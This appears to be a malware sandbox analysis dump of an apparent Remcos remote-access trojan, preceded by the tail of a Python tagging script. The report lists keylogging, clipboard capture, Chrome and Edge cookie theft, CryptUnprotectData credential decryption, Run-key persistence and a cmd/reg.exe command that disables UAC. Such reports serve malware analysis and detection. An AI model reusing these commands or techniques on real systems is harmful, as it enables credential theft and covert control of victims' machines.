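• Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
"""

if __name__ == "__main__":
    for opcode_id, tags in tag_text(SAMPLE):
        print(opcode_id, tags)
```

The argument lists the plugin prints are raw stack snapshots, so only positions that are genuinely the call's parameters should be decoded; trailing values such as the 0041A41F return addresses are caller context, which is why the decoder reads fixed parameter indices and treats "?" as unknown rather than trusting every value.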
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                    • GetLastError.KERNEL32 ref: 0041D611
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                    • CloseHandle.KERNEL32(?), ref: 004077E5
                                    • CloseHandle.KERNEL32(?), ref: 004077EA
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                    • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    Strings
                                    • C:\Users\user\AppData\Roaming\keHuNxIumw.exe, xrefs: 004076FF
                                    • SG, xrefs: 00407715
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                    • API String ID: 0-1716542089
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    APIs
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                    • Sleep.KERNEL32(00002710), ref: 0041AE98
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                    • _free.LIBCMT ref: 0044943D
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00449609
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    APIs
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                      • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                    • _free.LIBCMT ref: 0044F43F
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                    • _free.LIBCMT ref: 00448353
                                    • _free.LIBCMT ref: 0044837A
                                    • SetLastError.KERNEL32(00000000), ref: 00448387
                                    • SetLastError.KERNEL32(00000000), ref: 00448390
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    APIs
                                    • _free.LIBCMT ref: 00450A54
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00450A66
                                    • _free.LIBCMT ref: 00450A78
                                    • _free.LIBCMT ref: 00450A8A
                                    • _free.LIBCMT ref: 00450A9C
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    APIs
                                    • _free.LIBCMT ref: 00444106
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00444118
                                    • _free.LIBCMT ref: 0044412B
                                    • _free.LIBCMT ref: 0044413C
                                    • _free.LIBCMT ref: 0044414D
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    Strings
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E7B8
                                    • _free.LIBCMT ref: 0044E8D5
                                      • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                      • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                      • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                    Strings
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    APIs
                                    Strings
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000104), ref: 00443515
                                    • _free.LIBCMT ref: 004435E0
                                    • _free.LIBCMT ref: 004435EA
                                    Strings
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                    • API String ID: 2506810119-468870746
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                    • GetLastError.KERNEL32 ref: 0044B9B1
                                    Strings
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                    Strings
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    APIs
                                    • _wcslen.LIBCMT ref: 00416330
                                      • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                      • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                      • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                      • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                    Strings
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    APIs
                                      • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                    • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    APIs
                                      • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                    • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    Strings
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    APIs
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                    Strings
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Strings
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                    • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                    Strings
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                    • GetLastError.KERNEL32 ref: 0044C316
                                    • __dosmaperr.LIBCMT ref: 0044C31D
                                    Strings
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                    Strings
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                    • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                    Strings
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                      • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                      • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                    • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                    • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                    • ShowWindow.USER32(00000009), ref: 00416C9C
                                    • SetForegroundWindow.USER32 ref: 00416CA8
                                      • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                      • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                      • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API ID: _free
                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C130
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    APIs
                                      • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                      • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                      • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                    • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                    • Sleep.KERNEL32(00000064), ref: 0040A638
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                    • API ID: File$CloseCreateHandleReadSize
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                    • API ID: CloseHandleOpenProcess
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                      • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                    • _UnwindNestedFrames.LIBCMT ref: 00439911
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                    • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                    • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                    • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                    • API ID: MetricsSystem
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                      • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                    • GetLastError.KERNEL32 ref: 00449FAB
                                    • API ID: ByteCharErrorLastMultiWide
                                    • String ID: PkGNG
                                    APIs
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                    • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                    • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                    • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                    • GetLastError.KERNEL32 ref: 0044B884
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                    • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                    • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                    • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                    APIs
